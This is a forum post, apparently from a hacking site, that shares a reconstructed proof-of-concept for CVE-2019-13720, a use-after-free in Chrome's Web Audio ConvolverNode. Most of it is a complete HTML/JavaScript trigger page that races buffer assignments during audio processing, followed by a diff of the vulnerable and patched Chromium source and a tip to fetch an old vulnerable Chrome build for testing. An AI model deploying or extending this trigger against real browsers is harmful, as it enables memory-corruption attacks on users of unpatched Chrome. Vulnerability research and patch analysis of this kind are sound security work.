Announcement

Collapse
No announcement yet.

CVE-2019-13720 Releases semi PoC code

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • CVE-2019-13720 Releases semi PoC code

    This PoC code is a reconstruction of the "CVE-2019-13720" trigger code after identifying a patch suspected of being modified because of "CVE-2019-13720" in the Google Chrome browser source code.
    Currently, the original PoC code of "
    CVE-2019-13720" has not been released.
    Therefore, this PoC, which simply reconstructed the vulnerability, was limited.
    The code works up to the "
    v76.0.3809.132" version, but unfortunately this PoC trigger does not work from "v77.0.3865.75".
    It's because of my lack of PoC code.
    You'll have to be satisfied until someone releases the correct "
    CVE-2019-13720" PoC code.


    P.S:
    There is a portable version of Chrome in the archive on this site, so if you want to test it, download it (v76.0.3809.132).
    The Wizard's Opium is "LSD".
    I'm afraid the police will misunderstand. I think this "LSD" is short for Linux Single Daemon. Hahaha.
    <GNUSYS LAB twitter : I created a Twitter account.>
    https://twitter.com/GnusysL


    <Security News>

    https://www.boannews.com/media/view.asp?idx=84286
    https://www.tenable.com/blog/cve-201...ed-in-the-wild
    http://www.inews24.com/view/1219256
    https://www.cisecurity.org/advisory/...tion_2019-118/
    https://youyou-tech.com/2019/11/10/%...8%88%E8%A1%8C/
    https://securelist.com/chrome-0-day-...rdopium/94866/
    https://chromereleases.googleblog.co...&max-results=7
    https://chromereleases.googleblog.co...esktop_31.html
    https://securelist.com/chrome-0-day-...rdopium/94866/
    https://c.mi.com/thread-2581448-1-0.html
    https://twitter.com/cyberwar_15
    https://securelist.com/chrome-0-day-...346.1575584534
    https://www.edaily.co.kr/news/read?n...ediaCodeNo=257

    Code:
    <!DOCTYPE html>
    <html>
      <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width">
        <title>CVE-2019-13720: This "PoC" is released by "AmesianX(amesianx@gmail.com)" of "GNUSYS LAB" which belongs to the "POWERHACKER.NET" site.</title>
      </head>
      <body>
        <h1>CVE-2019-13720: Web Audio API ConvolverHandler's SetBuffer() UAF PoC for Google Chrome Browser Version v76.0.3809.132</h1>
        This PoC code is a reconstruction of the "CVE-2019-13720" trigger code after identifying a patch suspected of being modified because of "CVE-2019-13720" in the Google Chrome browser source code.<br>Currently, the original PoC code of "CVE-2019-13720" has not been released. Therefore, this PoC, which simply reconstructed the vulnerability, was limited.<br>The code works up to the "v76.0.3809.132" version, but unfortunately this PoC trigger does not work from "v77.0.3865.75".<br>It's because of my lack of PoC code. You'll have to be satisfied until someone releases the correct "CVE-2019-13720" PoC code.<br>
        <button onclick='CVE_2019_13720_PoC();'>Trigger the occult!</button>
        <pre></pre>
        <audio></audio>
        <script>
        function CVE_2019_13720_PoC()
        {
          var audioContext;
          var AudioBuffer;
          var convolver;
    
          AllSeeingEyes.src = "https://powerhacker.net/exploit_research/allseeingeyes.jpg";
          AllSeeingEyes.onload = async () => {
            audioContext = new OfflineAudioContext(1, 44100 * 40, 44100);
            processor = audioContext.createScriptProcessor(1024, 1, 1);
            processor.connect(audioContext.destination);
            AudioBuffer = audioContext.createBuffer(1, audioContext.sampleRate * 2.0, audioContext.sampleRate);
            processor.onaudioprocess = async () => {
              console.log('[+][processor] onaudioprocess');
              setTimeout(function () { console.log('[+][Trigger] convolver.buffer = null'); convolver.buffer = null; }, 0);
              convolver.buffer = AudioBuffer;
            }
            convolver = audioContext.createConvolver();
            convolver.buffer = AudioBuffer;
            convolver.connect(audioContext.destination);
            audio_buffer = await audioContext.startRendering();
            data = new Uint8Array(audio_buffer.getChannelData(0).buffer);
            console.log('[+] data.length = ' + data.length);
            /*
            for (let i = 0; i < data.length; i += 4) {
              console.log('[+] audio_buffer[' + i + ']: 0x' + data[i].toString(16));
            }
            */
          }
        }
        </script>
        <img id="AllSeeingEyes">
      </body>
    </html>
    Code:
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/76.0.3809.132/third_party/blink/renderer/modules/webaudio/convolver_node.cc#93 (Not Patched)   |
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/77.0.3865.75/third_party/blink/renderer/modules/webaudio/convolver_node.cc#100 (Not Patched)   |
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/78.0.3904.87/third_party/blink/renderer/modules/webaudio/convolver_node.cc#100 (Not Patched)   |
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/78.0.3904.97/third_party/blink/renderer/modules/webaudio/convolver_node.cc#100 (Google Patched)|
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | https://codereview.qt.nokia.com/c/qt/qtwebengine-chromium/+/279969                                                                                            |
    | https://codereview.qt.nokia.com/c/qt/qtwebengine-chromium/+/279917/3/chromium/third_party/blink/renderer/modules/webaudio/convolver_node.cc#114               |
    +-------------------------------------------------------------------------------+-------------------------------------------------------------------------------+
    |     // new impulse response.                                                  |     // new impulse response.                                                  |
    |     output_bus->Zero();                                                       |     output_bus->Zero();                                                       |
    |   }                                                                           |   }                                                                           |
    | }                                                                             | }                                                                             |
    |                                                                               |                                                                               |
    | void ConvolverHandler::SetBuffer(AudioBuffer* buffer,                         | void ConvolverHandler::SetBuffer(AudioBuffer* buffer,                         |
    |                                  ExceptionState& exception_state) {           |                                  ExceptionState& exception_state) {           |
    |   DCHECK(IsMainThread());                                                     |   DCHECK(IsMainThread());                                                     |
    |                                                                               |                                                                               |
    |   if (!buffer) {                                                              |   if (!buffer) {                                                              |
    |     reverb_.reset();                                                          |     // BaseAudioContext::GraphAutoLocker context_locker(Context());           |
    |     shared_buffer_ = nullptr;                                                 |     // MutexLocker locker(process_lock_);                                     |
    |     return;                                                                   |     reverb_.reset();                                                          |
    |   }                                                                           |     shared_buffer_ = nullptr;                                                 |
    |                                                                               |     return;                                                                   |
    |   if (buffer->sampleRate() != Context()->sampleRate()) {                      |   }                                                                           |
    |     exception_state.ThrowDOMException(                                        |                                                                               |
    |         DOMExceptionCode::kNotSupportedError,                                 |   if (buffer->sampleRate() != Context()->sampleRate()) {                      |
    |         "The buffer sample rate of " + String::Number(buffer->sampleRate()) + |     exception_state.ThrowDOMException(                                        |
    |             " does not match the context rate of " +                          |         DOMExceptionCode::kNotSupportedError,                                 |
    |                                                                               |         "The buffer sample rate of " + String::Number(buffer->sampleRate()) + |
    |                                                                               |             " does not match the context rate of " +                          |
    +-------------------------------------------------------------------------------+-------------------------------------------------------------------------------+
Working...
X